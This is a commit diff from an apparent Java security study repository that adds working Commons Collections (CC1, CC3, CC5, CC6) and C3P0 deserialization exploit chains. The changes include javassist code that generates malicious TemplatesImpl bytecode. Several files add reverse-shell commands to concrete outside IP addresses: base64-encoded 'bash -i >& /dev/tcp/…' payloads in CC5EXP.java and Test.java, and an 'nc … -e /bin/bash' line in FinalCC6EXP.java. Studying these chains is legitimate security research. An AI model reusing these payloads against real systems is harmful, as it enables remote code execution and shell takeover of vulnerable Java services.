🍻Write code drunkenly.

JavaSecurity/C3P0/C3P0Vuls/src/main/java/URLClassLoader/RefToURLClassLoader.java

@@ -6,7 +6,7 @@
 import java.lang.reflect.Method;
 import java.util.Hashtable;
 
-// 从 ReferenceableUtils 出发，调用 URLClassLoader 的 EXP (但是失败了
+// 从 ReferenceableUtils 出发，调用 URLClassLoader 的 EXP
 public class RefToURLClassLoader {
     public static void main(String[] args) throws ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException, NamingException, InstantiationException {
         Class clazz = Class.forName("com.mchange.v2.naming.ReferenceableUtils");

JavaSecurity/CC/CC1/src/EXP/FinalTransformMapEXP/TransformMapEXP.java

@@ -15,14 +15,15 @@
 // 最终的 EXP
 public class TransformMapEXP {
     public static void main(String[] args) throws Exception{
+        String[] cmd = {"Calc"};
         Transformer[] transformers = new Transformer[]{
             new ConstantTransformer(Runtime.class),
             new ConstantTransformer(Runtime.class), // 构造 setValue 的可控参数
             new InvokerTransformer("getMethod",
                     new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
             new InvokerTransformer("invoke"
                     , new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
-            new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
+            new InvokerTransformer("exec", new Class[]{String.class}, cmd)
         };
         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
         HashMap<Object, Object> hashMap = new HashMap<>();
@@ -34,8 +35,8 @@ public static void main(String[] args) throws Exception{
         Object o = aihConstructor.newInstance(Target.class, transformedMap);
 
         // 序列化反序列化
-        serialize(o);
-        //unserialize("ser.bin");
+//        serialize(o);
+        unserialize("ser.bin");
     }
     public static void serialize(Object obj) throws IOException {
         ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));

JavaSecurity/CC/CC3/pom.xml

@@ -9,12 +9,25 @@
     <version>1.0-SNAPSHOT</version>
 
     <dependencies>
-        <!-- https://mvnrepository.com/artifact/commons-collections/commons-collections -->
         <dependency>
             <groupId>commons-collections</groupId>
             <artifactId>commons-collections</artifactId>
             <version>3.2.1</version>
         </dependency>
+
+        <dependency>
+            <groupId>org.javassist</groupId>
+            <artifactId>javassist</artifactId>
+            <version>3.27.0-GA</version>
+        </dependency>
+
+        <dependency>
+            <groupId>org.jboss.classpool</groupId>
+            <artifactId>jboss-classpool</artifactId>
+            <version>1.0.0.GA</version>
+        </dependency>
+
+
     </dependencies>
     <properties>
         <maven.compiler.source>8</maven.compiler.source>

JavaSecurity/CC/CC3/src/main/CC3ysoEXP/CC1TransformedMapTemplatesEXP.java

@@ -1,3 +1,5 @@
+package main.CC3ysoEXP;
+
 import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
 import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
 import org.apache.commons.collections.Transformer;

JavaSecurity/CC/CC3/src/main/CC3ysoEXP/CC1YsoTemplatesEXP.java

@@ -1,3 +1,5 @@
+package main.CC3ysoEXP;
+
 import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
 import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
 import org.apache.commons.collections.Transformer;

JavaSecurity/CC/CC3/src/main/CC3ysoEXP/CC3FinalEXP1.java

@@ -1,6 +1,11 @@
+package CC3ysoEXP;
+
 import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
 import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
 import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtConstructor;
 import org.apache.commons.collections.Transformer;
 import org.apache.commons.collections.functors.ChainedTransformer;
 import org.apache.commons.collections.functors.ConstantTransformer;
@@ -31,13 +36,14 @@ public static void main(String[] args) throws Exception
 
         Field bytecodesField = templatesClass.getDeclaredField("_bytecodes");
         bytecodesField.setAccessible(true);
-        byte[] evil = Files.readAllBytes(Paths.get("E://Calc.class"));
+        // new String[]{\"/bin/bash\", \"-c\", \"{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAuNzkuMC4xNjQvMTIzNiAwPiYx}|{base64,-d}|{bash,-i}\"}"
+        byte[] evil = getTemplatesImpl("Calc");
         byte[][] codes = {evil};
         bytecodesField.set(templates,codes);
 
-        Field tfactoryField = templatesClass.getDeclaredField("_tfactory");
-        tfactoryField.setAccessible(true);
-        tfactoryField.set(templates, new TransformerFactoryImpl());
+//        Field tfactoryField = templatesClass.getDeclaredField("_tfactory");
+//        tfactoryField.setAccessible(true);
+//        tfactoryField.set(templates, new TransformerFactoryImpl());
         //    templates.newTransformer();
 
         InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class},
@@ -73,4 +79,26 @@ public static Object unserialize(String Filename) throws IOException, ClassNotFo
         Object obj = ois.readObject();
         return obj;
     }
+
+    public static byte[] getTemplatesImpl(String cmd) {
+        try {
+            ClassPool pool = ClassPool.getDefault();
+            CtClass ctClass = pool.makeClass("Evil");
+            CtClass superClass = pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet");
+            ctClass.setSuperclass(superClass);
+            CtConstructor constructor = ctClass.makeClassInitializer();
+            constructor.setBody(" try {\n" +
+                    " Runtime.getRuntime().exec(\"" + cmd +
+                    "\");\n" +
+                    " } catch (Exception ignored) {\n" +
+                    " }");
+            // "new String[]{\"/bin/bash\", \"-c\", \"{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC80Ny4xMC4xMS4yMzEvOTk5MCAwPiYx}|{base64,-d}|{bash,-i}\"}"
+            byte[] bytes = ctClass.toBytecode();
+            ctClass.defrost();
+            return bytes;
+        } catch (Exception e) {
+            e.printStackTrace();
+            return new byte[]{};
+        }
+    }
 }

JavaSecurity/CC/CC3/src/main/CC3ysoEXP/CC3FinalEXP2.java

@@ -1,3 +1,5 @@
+package CC3ysoEXP;
+
 import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
 import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
 import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;

JavaSecurity/CC/CC3/src/main/CC3ysoEXP/CC3HalfEXP.java

@@ -1,3 +1,5 @@
+package main.CC3ysoEXP;
+
 import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
 import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
 import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;

JavaSecurity/CC/CC3/src/main/CC3ysoEXP/CC6TemplatesEXP.java

@@ -1,3 +1,5 @@
+package main.CC3ysoEXP;
+
 import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
 import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
 import org.apache.commons.collections.Transformer;

JavaSecurity/CC/CC3/src/main/CC3ysoEXP/Calc.java

@@ -1,3 +1,5 @@
+package main.CC3ysoEXP;
+
 import com.sun.org.apache.xalan.internal.xsltc.DOM;
 import com.sun.org.apache.xalan.internal.xsltc.TransletException;
 import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;

JavaSecurity/CC/CC3/src/main/CC3ysoEXP/TemplatesImplEXP.java

@@ -1,3 +1,5 @@
+package CC3ysoEXP;
+
 import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
 import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
 

JavaSecurity/CC/CC5/pom.xml

@@ -8,12 +8,28 @@
     <artifactId>CC5</artifactId>
     <version>1.0-SNAPSHOT</version>
     <dependencies>
-        <!-- https://mvnrepository.com/artifact/commons-collections/commons-collections -->
         <dependency>
             <groupId>commons-collections</groupId>
             <artifactId>commons-collections</artifactId>
             <version>3.2.1</version>
         </dependency>
+        <dependency>
+            <groupId>org.javassist</groupId>
+            <artifactId>javassist</artifactId>
+            <version>3.27.0-GA</version>
+        </dependency>
+
+        <dependency>
+            <groupId>org.jboss.classpool</groupId>
+            <artifactId>jboss-classpool</artifactId>
+            <version>1.0.0.GA</version>
+        </dependency>
+        <dependency>
+            <groupId>org.apache.commons</groupId>
+            <artifactId>commons-collections4</artifactId>
+            <version>4.4</version>
+        </dependency>
+
     </dependencies>
     <properties>
         <maven.compiler.source>8</maven.compiler.source>

JavaSecurity/CC/CC5/src/CC5EXP/CC5EXP.java

@@ -1,3 +1,5 @@
+package CC5EXP;
+
 import org.apache.commons.collections.Transformer;
 import org.apache.commons.collections.functors.ChainedTransformer;
 import org.apache.commons.collections.functors.ConstantTransformer;
@@ -20,7 +22,7 @@ public static void main(String[] args) throws Exception{
                         new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                 new InvokerTransformer("invoke"
                         , new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
-                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
+                new InvokerTransformer("exec", new Class[]{String.class}, new String[]{"\"/bin/bash\", \"-c\", \"{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84MS42OC4xMjAuMTQvMjMzNCAwPiYx}|{base64,-d}|{bash,-i}\"}"})
         };
         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
         HashMap<Object, Object> hashMap = new HashMap<>();

JavaSecurity/CC/CC5/src/CC5EXP/Test.java

@@ -1,2 +1,118 @@
-package CC5EXP;public class Test {
-}
+package CC5EXP;
+
+import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
+import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
+import javassist.ClassPool;
+import javassist.CtClass;
+import javassist.CtConstructor;
+import org.apache.commons.collections.Transformer;
+import org.apache.commons.collections.functors.ChainedTransformer;
+import org.apache.commons.collections.functors.ConstantTransformer;
+import org.apache.commons.collections.functors.InstantiateTransformer;
+import org.apache.commons.collections.functors.InvokerTransformer;
+import org.apache.commons.collections.keyvalue.TiedMapEntry;
+import org.apache.commons.collections.map.LazyMap;
+import org.apache.commons.collections.map.TransformedMap;
+
+import javax.xml.transform.Templates;
+import java.io.*;
+import java.lang.annotation.Target;
+import java.lang.reflect.Constructor;
+import java.lang.reflect.Field;
+import java.lang.reflect.InvocationHandler;
+import java.lang.reflect.Proxy;
+import java.util.Base64;
+import java.util.HashMap;
+import java.util.Map;
+
+public class Test {
+    public static void setValue(String name, Object target, Object value) {
+        try {
+            Field field = target.getClass().getDeclaredField(name);
+            field.setAccessible(true);
+            field.set(target, value);
+        } catch (Exception ignore) {
+        }
+    }
+
+    public  static  void  serialize(Object obj) throws IOException {
+        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("ser.bin"));
+        oos.writeObject(obj);
+    }
+
+    public  static  Object  unserialize(String Filename) throws IOException, ClassNotFoundException {
+        ObjectInputStream ois = new ObjectInputStream(new FileInputStream(Filename));
+        Object obj = ois.readObject();
+        return obj;
+    }
+
+    public static void setValue(Object target, String name, Object value) throws Exception {
+        Class c = target.getClass();
+        Field field = c.getDeclaredField(name);
+        field.setAccessible(true);
+        field.set(target,value);
+    }
+
+    public static byte[] getTemplatesImpl(String cmd) {
+        try {
+            ClassPool pool = ClassPool.getDefault();
+            CtClass ctClass = pool.makeClass("Evil");
+            CtClass superClass = pool.get("com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet");
+            ctClass.setSuperclass(superClass);
+            CtConstructor constructor = ctClass.makeClassInitializer();
+            constructor.setBody(" try {\n" +
+                    " Runtime.getRuntime().exec(\"" + cmd +
+                    "\");\n" +
+                    " } catch (Exception ignored) {\n" +
+                    " }");
+            byte[] bytes = ctClass.toBytecode();
+            ctClass.defrost();
+            return bytes;
+        } catch (Exception e) {
+            e.printStackTrace();
+            return new byte[]{};
+        }
+    }
+
+    public static void main(String[] args) throws Exception {
+
+        TemplatesImpl templates = new TemplatesImpl();
+        setValue(templates,"_name", "aaa");
+
+        byte[] code = getTemplatesImpl("\"/bin/bash\", \"-c\", \"{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84MS42OC4xMjAuMTQvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}\"}");
+        byte[][] bytecodes = {code};
+        setValue(templates, "_bytecodes", bytecodes);
+        setValue(templates,"_tfactory", new TransformerFactoryImpl());
+
+
+
+        Transformer[] transformers = new Transformer[]{
+                new ConstantTransformer(TrAXFilter.class),
+                new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates})
+
+        };
+
+        ChainedTransformer chainedTransformer = new  ChainedTransformer(transformers);
+
+        HashMap<Object,Object> map = new  HashMap<>();
+        Map<Object,Object> lazyMap = LazyMap.decorate(map, new ConstantTransformer(1));
+
+        TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, "key");
+
+        HashMap<Object, Object> map2 = new HashMap<>();
+        map2.put(tiedMapEntry, "bbb");
+        lazyMap.remove("key");
+
+        Class c = LazyMap.class;
+        Field field =  c.getDeclaredField("factory");
+        field.setAccessible(true);
+        field.set(lazyMap, chainedTransformer);
+
+        serialize(map2);
+        unserialize("ser.bin");
+        //templates.newTransformer();
+
+    }
+}

JavaSecurity/CC/CC6/src/CC6ysoEXP/FinalCC6EXP.java

@@ -13,11 +13,12 @@
 // CC6 链最终 EXP
 public class FinalCC6EXP {
     public static void main(String[] args) throws Exception{
+        String[] cmd = {"nc 81.68.120.14 9990 -e /bin/bash"};
         Transformer[] transformers = new Transformer[]{
                 new ConstantTransformer(Runtime.class),
                 new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class}, new Object[]{"getRuntime", null}),
                 new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class}, new Object[]{null, null}),
-                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
+                new InvokerTransformer("exec", new Class[]{String.class}, cmd)
         };
         ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);
         HashMap<Object, Object> hashMap = new HashMap<>();

JavaSecurity/CodeReview/JavaSec-Code/CC/pom.xml

@@ -9,6 +9,26 @@
     </parent>
     <modelVersion>4.0.0</modelVersion>
 
+    <dependencies>
+        <dependency>
+            <groupId>org.apache.commons</groupId>
+            <artifactId>commons-collections4</artifactId>
+            <version>4.0</version>
+        </dependency>
+
+        <dependency>
+            <groupId>org.javassist</groupId>
+            <artifactId>javassist</artifactId>
+            <version>3.27.0-GA</version>
+        </dependency>
+
+        <dependency>
+            <groupId>org.jboss.classpool</groupId>
+            <artifactId>jboss-classpool</artifactId>
+            <version>1.0.0.GA</version>
+        </dependency>
+    </dependencies>
+
     <artifactId>CC</artifactId>
 
     <properties>